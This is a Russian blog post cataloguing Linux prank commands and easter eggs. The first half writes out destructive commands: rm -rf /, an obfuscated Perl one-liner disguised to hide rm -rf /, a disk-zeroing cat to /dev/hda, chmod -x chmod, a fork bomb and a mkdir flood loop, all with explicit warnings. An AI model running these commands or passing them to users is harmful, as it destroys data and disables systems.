понедельник, 2 февраля 2009 г.

Пасхальные яйца Linux. Шутки в стиле UNIX

Вирусов под Линукс мало, чтобы там производители антивирусов не говорили. Поэтому в этом плане процветают различные шутки и подколы, временами весьма жестокие. Лишний раз заставит задуматься - а стоит ли запускать программу и работать с высокими привилегями?

ВНИМАНИЕ! НЕ ВЗДУМАЙТЕ ЗАПУСКАТЬ НА ОТВЕТСТВЕННЫХ МАШИНАХ НИ ОДНУ ИЗ ЭТИХ ПРОГРАММ! АВТОР БЛОГА НЕ НЕСЁТ НИКАКОЙ ОТВЕТСТВЕННОСТИ ЗА ПОВРЕЖДЕНИЕ ДАННЫХ ПРИВЕДЁННЫМИ ПРОГРАММАМИ! НИЖЕСЛЕДУЮЩЕЕ ПРИВОДИТСЯ ИСКЛЮЧИТЕЛЬНО В ИЛЛЮСТРАТИВНЫХ ЦЕЛЯХ! НИКОГДА НЕ РАБОТАЙТЕ ПОСТОЯННО ПОД ROOT-АККАУНТОМ И НЕ ЗАПУСКАЙТЕ ПРОГРАММЫ, СМЫСЛ КОТОРЫХ ВАМ НЕ ЯСЕН! ПОСЛЕДСТВИЯ УЖАСНЫ!

Эпиграф
вирусы под линукс распространяются методом
“ух ты! дай посмотреть!” (C)

Классика жанра
Действие: rm -rf /
Системные требования: root
Последствия:
сносит все данные без предупреждений. Хотя бы раз так подкалывали, наверное, всех. Большинство других шуток есть “вариация на тему” . Несмотря на очевидный смысл, множество форм белковой жизни выполняло её на своих машинах с целью “на посмотреть” (кстати, видеоролик, спасибо комментаторам). Есть вариант, найденный на БОРе, который называется “русская рулетка”:

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “Жив”

Что называется, для любителей острых ощущений.

Perl`овый юмор
Действие: cat “test… test… test…” | perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/” -;;s;;$_;see’
Системные требования: root, наличие perl
Последствия:
довольно остроумная шутка на perl, скрывающая истинную команду rm -rf /
Было на LOR и вызвало, естественно, потерю данных у многих из его постоянных обитателей, решивших “помочь” злобному автору “отладить” программу. Некоторые “помогали” на работающих “боевых” серверах.


Укусить себя за хвост

Действие: chmod -x chmod
Системные требования: root
Последствия:
естественно, сменить права потом невозможно ни у о одного файла.
Шутка, благодаря bash.org.ru ставшая легендой. Вообще, шутки с правами достаточно популярны.

Забой нулями
Действие: cat /dev/zero >/dev/hda
Системные требования: root
Последствия:
забивает нулями все разделы первого IDE-винчестера. С распространением SATA-дисков нужно кое-что изменить, но тем не менее.

Форк-бомба (forkbomb)
Действие: :( ){ :| :&};:
Системные требования: не требуется
Последствия:
основная мысль - заполнить ресурсы системы бесполезными копиями программы. По причине исчерпания ресурсов система по крайней мере на некоторое время становится недоступна для пользователя. На том же LOR обсуждалось и опробовалось многочисленными участниками. При правильном использовании команды ulimit ущерб минимален (обычно по умолчанию количество процессов ставится нелимитированным).

Музыка в стиле драм
Действие: cat /boot/kernel > /dev/dsp
Системные требования: не требуется
Последствия:
из колонок начнут доноситься жуткие звуки, ибо загрузочный образ ядра напрямую будет передан на звуковое устройство. Кому-то нравится вариант cat /dev/mouse > /dev/dsp


Файл-флуд
Действие: выполнение скрита

while : ; do
mkdir subdir
cd subdir
done

Системные требования: специальных требований нет
Последствия:
создание огромного количества подкаталогов может исчерпать место на диске и во всяком случае существенно замедляет систему. Впрочем, через некоторое время это будет прекращено: слишком длинное имя получится, о чём система сообщит. Эффективно предотвращается при помощи дисковых квот.

ASCII-art, или искусство псевдографики
Действие: псевдографические рисунки в консоли
Системные требования: специальных требований нет
Последствия: Это, как правило, просто шутки без разрушительных последствий. Например, если от пользователя набрать команду

apt-get moo

То в ответ будет выдано:

Так же в Дебиане есть пакет sl. Его действие сводится к тому, что если пользователь набирает по ошибке sl в консоли, в консоль выезжает анимированный псевдографический паровоз, проносится через консоль и возвращает ей управление.


Вреда нет и пользы тоже, но забавно…

в Gnome
1. Нажмите Alt+F2 ("Выполнить программу"), наберите фразу "free the fish" без кавычек. Для восстановления работы панели нажмите Alt+F2 и наберите "killall gnome-panel" (без кавычек).
2. В терминале наберите apt-get --help. А теперь apt-get moo. Ну как, вы сегодня уже мычали?
3. Попробуем сделать то же самое с aptitude: aptitude --help. Хм, в этой программе вроде нет пасхальных яиц... Но так ли это? Попробуйте aptitude moo. Не получается? А если aptitude moo -v? (Попробуйте добавлять v и посмотрите, что получится).
4. Нажмите Alt+F2 ("Выполнить программу"), наберите фразу "gegls from outer space" без кавычек. Война до победного конца!

Взято отсюда.
FireFox
А вы уже знаете, что будет если в firefox вместо адреса сайта набрать about:robots?

Ругательства в исходниках
Тоже давно известная шутка, которую нельзя обойти вниманием.
Команда:
grep -r fuck /usr/src/linux[TAB]/*
покажет вам самые искренние комментарии программистов.
Когда вы наберете linux, нажмите tab, чтобы посмотреть какие исходники есть у вас в компьютере.

OpenOffice Writer
Создайте новый документ, наберите StarWriterTeam и нажмите F3.
Calc
В любой клетке наберите =STARCALCTEAM() и сможете лицезреть команду разработчиков в каком-то баре.

Cowsay
Для начала вам придется установить программу cowsay которая позволяет произносить фразы от имени нарисованной коровы. Установить можно, выполнив следующую команду:
sudo apt-get install cowsay
А теперь наберите:
cowsay -f head-in.cow ouch

Mozilla
Это пасхальное яйцо считается одним из самых классных. Во всех версиях Firefox и даже Netscape в адресной строке надо набрать: about:mozilla Вам покажут стилизованную под Библию цитату из Книги Mozilla.
Если вы пользуетесь Firefox, то можете тоже попробовать. В разных версиях показываются разные фразы, причем в русской версии они будут на русском.

KDE
У конкурента GNOME то есть пасхальные яйца за пазухой. Откройте Kexi и создайте новую таблицу с именем sudoku. Наслаждайтесь игрой с одноименным названием.

Комментариев нет:

Отправить комментарий